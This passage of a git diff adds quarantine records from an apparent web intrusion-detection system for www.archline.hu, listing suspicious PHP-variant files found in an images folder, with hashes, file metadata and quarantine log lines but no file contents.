"vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/i9wliit0.php.json b/var/www/hosting/archline.hu/www/i9wliit0.php.json new file mode 100644 index 0000000..4898f61 --- /dev/null +++ b/var/www/hosting/archline.hu/www/i9wliit0.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/i9wliit0.php.json.evidence.json b/var/www/hosting/archline.hu/www/i9wliit0.php.json.evidence.json new file mode 100644 index 0000000..383373b --- /dev/null +++ b/var/www/hosting/archline.hu/www/i9wliit0.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2842", + "log_excerpt": "[quarantine] www.archline.hu:i9wliit0.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/i9wliit0.php.json)", + "original_sha256": "d4833d1399b264d7c64e932658c19246d5fd6aedee2233ed0faf4bb8d257004a", + "original_stat": { + "gid": 30037, + "mtime": 1783930736, + "size": 57, + "uid": 20043 + }, + "rel_path": "i9wliit0.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_5pvatqpr.php.json b/var/www/hosting/archline.hu/www/images/_h3x_5pvatqpr.php.json new file mode 100644 index 0000000..6fc575b --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_5pvatqpr.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_5pvatqpr.php.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_5pvatqpr.php.json.evidence.json new file mode 100644 index 0000000..3b31488 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_5pvatqpr.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3440", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_5pvatqpr.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_5pvatqpr.php.json)", + "original_sha256": "1f41898baa990db755bfb3c877a9aeab02d98eb31d49fe508da9bde84c47239a", + "original_stat": { + "gid": 30037, + "mtime": 1783843870, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_5pvatqpr.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_5pvatqpr.php5.json b/var/www/hosting/archline.hu/www/images/_h3x_5pvatqpr.php5.json new file mode 100644 index 0000000..6fc575b --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_5pvatqpr.php5.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_5pvatqpr.php5.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_5pvatqpr.php5.json.evidence.json new file mode 100644 index 0000000..9396721 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_5pvatqpr.php5.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3475", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_5pvatqpr.php5.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_5pvatqpr.php5.json)", + "original_sha256": "1f41898baa990db755bfb3c877a9aeab02d98eb31d49fe508da9bde84c47239a", + "original_stat": { + "gid": 30037, + "mtime": 1783843872, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_5pvatqpr.php5.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_5pvatqpr.pht.json b/var/www/hosting/archline.hu/www/images/_h3x_5pvatqpr.pht.json new file mode 100644 index 0000000..6fc575b --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_5pvatqpr.pht.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_5pvatqpr.pht.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_5pvatqpr.pht.json.evidence.json new file mode 100644 index 0000000..18b0004 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_5pvatqpr.pht.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3482", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_5pvatqpr.pht.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_5pvatqpr.pht.json)", + "original_sha256": "1f41898baa990db755bfb3c877a9aeab02d98eb31d49fe508da9bde84c47239a", + "original_stat": { + "gid": 30037, + "mtime": 1783843872, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_5pvatqpr.pht.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_5pvatqpr.phtml.json b/var/www/hosting/archline.hu/www/images/_h3x_5pvatqpr.phtml.json new file mode 100644 index 0000000..6fc575b --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_5pvatqpr.phtml.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_5pvatqpr.phtml.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_5pvatqpr.phtml.json.evidence.json new file mode 100644 index 0000000..2696ebd --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_5pvatqpr.phtml.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3503", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_5pvatqpr.phtml.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_5pvatqpr.phtml.json)", + "original_sha256": "1f41898baa990db755bfb3c877a9aeab02d98eb31d49fe508da9bde84c47239a", + "original_stat": { + "gid": 30037, + "mtime": 1783843871, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_5pvatqpr.phtml.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_82r3zlho.php.json b/var/www/hosting/archline.hu/www/images/_h3x_82r3zlho.php.json new file mode 100644 index 0000000..ee60a11 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_82r3zlho.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_82r3zlho.php.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_82r3zlho.php.json.evidence.json new file mode 100644 index 0000000..5286950 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_82r3zlho.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3470", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_82r3zlho.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_82r3zlho.php.json)", + "original_sha256": "537445e14c909f954cf42ab038dc00d542626caa50c184ba074ae9798bbd1fe0", + "original_stat": { + "gid": 30037, + "mtime": 1783745099, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_82r3zlho.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_82r3zlho.php5.json b/var/www/hosting/archline.hu/www/images/_h3x_82r3zlho.php5.json new file mode 100644 index 0000000..ee60a11 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_82r3zlho.php5.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_82r3zlho.php5.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_82r3zlho.php5.json.evidence.json new file mode 100644 index 0000000..010eaf6 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_82r3zlho.php5.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3500", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_82r3zlho.php5.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_82r3zlho.php5.json)", + "original_sha256": "537445e14c909f954cf42ab038dc00d542626caa50c184ba074ae9798bbd1fe0", + "original_stat": { + "gid": 30037, + "mtime": 1783745101, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_82r3zlho.php5.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_82r3zlho.pht.json b/var/www/hosting/archline.hu/www/images/_h3x_82r3zlho.pht.json new file mode 100644 index 0000000..ee60a11 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_82r3zlho.pht.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_82r3zlho.pht.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_82r3zlho.pht.json.evidence.json new file mode 100644 index 0000000..cf8c5ef --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_82r3zlho.pht.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3468", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_82r3zlho.pht.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_82r3zlho.pht.json)", + "original_sha256": "537445e14c909f954cf42ab038dc00d542626caa50c184ba074ae9798bbd1fe0", + "original_stat": { + "gid": 30037, + "mtime": 1783745101, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_82r3zlho.pht.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_82r3zlho.phtml.json b/var/www/hosting/archline.hu/www/images/_h3x_82r3zlho.phtml.json new file mode 100644 index 0000000..ee60a11 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_82r3zlho.phtml.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_82r3zlho.phtml.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_82r3zlho.phtml.json.evidence.json new file mode 100644 index 0000000..114b8f2 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_82r3zlho.phtml.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3463", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_82r3zlho.phtml.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_82r3zlho.phtml.json)", + "original_sha256": "537445e14c909f954cf42ab038dc00d542626caa50c184ba074ae9798bbd1fe0", + "original_stat": { + "gid": 30037, + "mtime": 1783745101, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_82r3zlho.phtml.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_d7k69ebu.php.json b/var/www/hosting/archline.hu/www/images/_h3x_d7k69ebu.php.json new file mode 100644 index 0000000..ee60a11 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_d7k69ebu.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_d7k69ebu.php.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_d7k69ebu.php.json.evidence.json new file mode 100644 index 0000000..68462c1 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_d7k69ebu.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3495", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_d7k69ebu.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_d7k69ebu.php.json)", + "original_sha256": "537445e14c909f954cf42ab038dc00d542626caa50c184ba074ae9798bbd1fe0", + "original_stat": { + "gid": 30037, + "mtime": 1783744956, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_d7k69ebu.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_d7k69ebu.php5.json b/var/www/hosting/archline.hu/www/images/_h3x_d7k69ebu.php5.json new file mode 100644 index 0000000..ee60a11 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_d7k69ebu.php5.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_d7k69ebu.php5.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_d7k69ebu.php5.json.evidence.json new file mode 100644 index 0000000..fbb5b09 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_d7k69ebu.php5.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3474", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_d7k69ebu.php5.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_d7k69ebu.php5.json)", + "original_sha256": "537445e14c909f954cf42ab038dc00d542626caa50c184ba074ae9798bbd1fe0", + "original_stat": { + "gid": 30037, + "mtime": 1783744958, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_d7k69ebu.php5.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_d7k69ebu.pht.json b/var/www/hosting/archline.hu/www/images/_h3x_d7k69ebu.pht.json new file mode 100644 index 0000000..ee60a11 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_d7k69ebu.pht.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_d7k69ebu.pht.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_d7k69ebu.pht.json.evidence.json new file mode 100644 index 0000000..a041d39 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_d7k69ebu.pht.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3465", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_d7k69ebu.pht.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_d7k69ebu.pht.json)", + "original_sha256": "537445e14c909f954cf42ab038dc00d542626caa50c184ba074ae9798bbd1fe0", + "original_stat": { + "gid": 30037, + "mtime": 1783744957, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_d7k69ebu.pht.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_d7k69ebu.phtml.json b/var/www/hosting/archline.hu/www/images/_h3x_d7k69ebu.phtml.json new file mode 100644 index 0000000..ee60a11 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_d7k69ebu.phtml.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_d7k69ebu.phtml.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_d7k69ebu.phtml.json.evidence.json new file mode 100644 index 0000000..00fc184 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_d7k69ebu.phtml.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3491", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_d7k69ebu.phtml.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_d7k69ebu.phtml.json)", + "original_sha256": "537445e14c909f954cf42ab038dc00d542626caa50c184ba074ae9798bbd1fe0", + "original_stat": { + "gid": 30037, + "mtime": 1783744957, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_d7k69ebu.phtml.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_g9leli2p.php.json b/var/www/hosting/archline.hu/www/images/_h3x_g9leli2p.php.json new file mode 100644 index 0000000..ee60a11 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_g9leli2p.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_g9leli2p.php.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_g9leli2p.php.json.evidence.json new file mode 100644 index 0000000..bd8e466 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_g9leli2p.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3490", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_g9leli2p.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_g9leli2p.php.json)", + "original_sha256": "537445e14c909f954cf42ab038dc00d542626caa50c184ba074ae9798bbd1fe0", + "original_stat": { + "gid": 30037, + "mtime": 1783744948, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_g9leli2p.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_g9leli2p.php5.json b/var/www/hosting/archline.hu/www/images/_h3x_g9leli2p.php5.json new file mode 100644 index 0000000..ee60a11 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_g9leli2p.php5.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_g9leli2p.php5.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_g9leli2p.php5.json.evidence.json new file mode 100644 index 0000000..a56c18f --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_g9leli2p.php5.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3481", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_g9leli2p.php5.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_g9leli2p.php5.json)", + "original_sha256": "537445e14c909f954cf42ab038dc00d542626caa50c184ba074ae9798bbd1fe0", + "original_stat": { + "gid": 30037, + "mtime": 1783744950, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_g9leli2p.php5.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_g9leli2p.pht.json b/var/www/hosting/archline.hu/www/images/_h3x_g9leli2p.pht.json new file mode 100644 index 0000000..ee60a11 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_g9leli2p.pht.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_g9leli2p.pht.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_g9leli2p.pht.json.evidence.json new file mode 100644 index 0000000..f299d25 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_g9leli2p.pht.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3496", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_g9leli2p.pht.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_g9leli2p.pht.json)", + "original_sha256": "537445e14c909f954cf42ab038dc00d542626caa50c184ba074ae9798bbd1fe0", + "original_stat": { + "gid": 30037, + "mtime": 1783744950, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_g9leli2p.pht.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_g9leli2p.phtml.json b/var/www/hosting/archline.hu/www/images/_h3x_g9leli2p.phtml.json new file mode 100644 index 0000000..ee60a11 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_g9leli2p.phtml.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_g9leli2p.phtml.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_g9leli2p.phtml.json.evidence.json new file mode 100644 index 0000000..b291aba --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_g9leli2p.phtml.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3505", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_g9leli2p.phtml.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_g9leli2p.phtml.json)", + "original_sha256": "537445e14c909f954cf42ab038dc00d542626caa50c184ba074ae9798bbd1fe0", + "original_stat": { + "gid": 30037, + "mtime": 1783744949, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_g9leli2p.phtml.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_gphxjf90.php.json b/var/www/hosting/archline.hu/www/images/_h3x_gphxjf90.php.json new file mode 100644 index 0000000..f04e608 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_gphxjf90.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_gphxjf90.php.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_gphxjf90.php.json.evidence.json new file mode 100644 index 0000000..9c9bbc1 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_gphxjf90.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3506", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_gphxjf90.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_gphxjf90.php.json)", + "original_sha256": "f7e1ff6dbee18d9ceb97c089ad09d61f3b5e6a74d1eaefcf2eb1f26c1334c05b", + "original_stat": { + "gid": 30037, + "mtime": 1783745372, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_gphxjf90.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_gphxjf90.php5.json b/var/www/hosting/archline.hu/www/images/_h3x_gphxjf90.php5.json new file mode 100644 index 0000000..f04e608 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_gphxjf90.php5.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_gphxjf90.php5.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_gphxjf90.php5.json.evidence.json new file mode 100644 index 0000000..bf8eef1 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_gphxjf90.php5.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3466", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_gphxjf90.php5.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_gphxjf90.php5.json)", + "original_sha256": "f7e1ff6dbee18d9ceb97c089ad09d61f3b5e6a74d1eaefcf2eb1f26c1334c05b", + "original_stat": { + "gid": 30037, + "mtime": 1783745375, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_gphxjf90.php5.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_gphxjf90.pht.json b/var/www/hosting/archline.hu/www/images/_h3x_gphxjf90.pht.json new file mode 100644 index 0000000..f04e608 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_gphxjf90.pht.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_gphxjf90.pht.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_gphxjf90.pht.json.evidence.json new file mode 100644 index 0000000..e6f4f2e --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_gphxjf90.pht.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3459", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_gphxjf90.pht.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_gphxjf90.pht.json)", + "original_sha256": "f7e1ff6dbee18d9ceb97c089ad09d61f3b5e6a74d1eaefcf2eb1f26c1334c05b", + "original_stat": { + "gid": 30037, + "mtime": 1783745375, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_gphxjf90.pht.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_gphxjf90.phtml.json b/var/www/hosting/archline.hu/www/images/_h3x_gphxjf90.phtml.json new file mode 100644 index 0000000..f04e608 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_gphxjf90.phtml.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_gphxjf90.phtml.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_gphxjf90.phtml.json.evidence.json new file mode 100644 index 0000000..bf2b971 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_gphxjf90.phtml.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3485", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_gphxjf90.phtml.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_gphxjf90.phtml.json)", + "original_sha256": "f7e1ff6dbee18d9ceb97c089ad09d61f3b5e6a74d1eaefcf2eb1f26c1334c05b", + "original_stat": { + "gid": 30037, + "mtime": 1783745374, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_gphxjf90.phtml.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_ho2z5yid.php.json b/var/www/hosting/archline.hu/www/images/_h3x_ho2z5yid.php.json new file mode 100644 index 0000000..2502a03 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_ho2z5yid.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_ho2z5yid.php.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_ho2z5yid.php.json.evidence.json new file mode 100644 index 0000000..6a8d135 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_ho2z5yid.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3452", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_ho2z5yid.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_ho2z5yid.php.json)", + "original_sha256": "c5a291910c1c5c3d846e1d6764610c5ce35b5916ede2f39fce7ba795b3ba4849", + "original_stat": { + "gid": 30037, + "mtime": 1783745300, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_ho2z5yid.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_ho2z5yid.php5.json b/var/www/hosting/archline.hu/www/images/_h3x_ho2z5yid.php5.json new file mode 100644 index 0000000..2502a03 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_ho2z5yid.php5.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_ho2z5yid.php5.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_ho2z5yid.php5.json.evidence.json new file mode 100644 index 0000000..09fe235 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_ho2z5yid.php5.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3501", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_ho2z5yid.php5.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_ho2z5yid.php5.json)", + "original_sha256": "c5a291910c1c5c3d846e1d6764610c5ce35b5916ede2f39fce7ba795b3ba4849", + "original_stat": { + "gid": 30037, + "mtime": 1783745303, + "size": 45, + "uid": 20043 + }, + "rel_path": "images/_h3x_ho2z5yid.php5.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/images/_h3x_ho2z5yid.pht.json b/var/www/hosting/archline.hu/www/images/_h3x_ho2z5yid.pht.json new file mode 100644 index 0000000..2502a03 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_ho2z5yid.pht.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/images/_h3x_ho2z5yid.pht.json.evidence.json b/var/www/hosting/archline.hu/www/images/_h3x_ho2z5yid.pht.json.evidence.json new file mode 100644 index 0000000..9977404 --- /dev/null +++ b/var/www/hosting/archline.hu/www/images/_h3x_ho2z5yid.pht.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3445", + "log_excerpt": "[quarantine] www.archline.hu:images/_h3x_ho2z5yid.pht.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/images/_h3x_ho2z5yid.pht.json)", 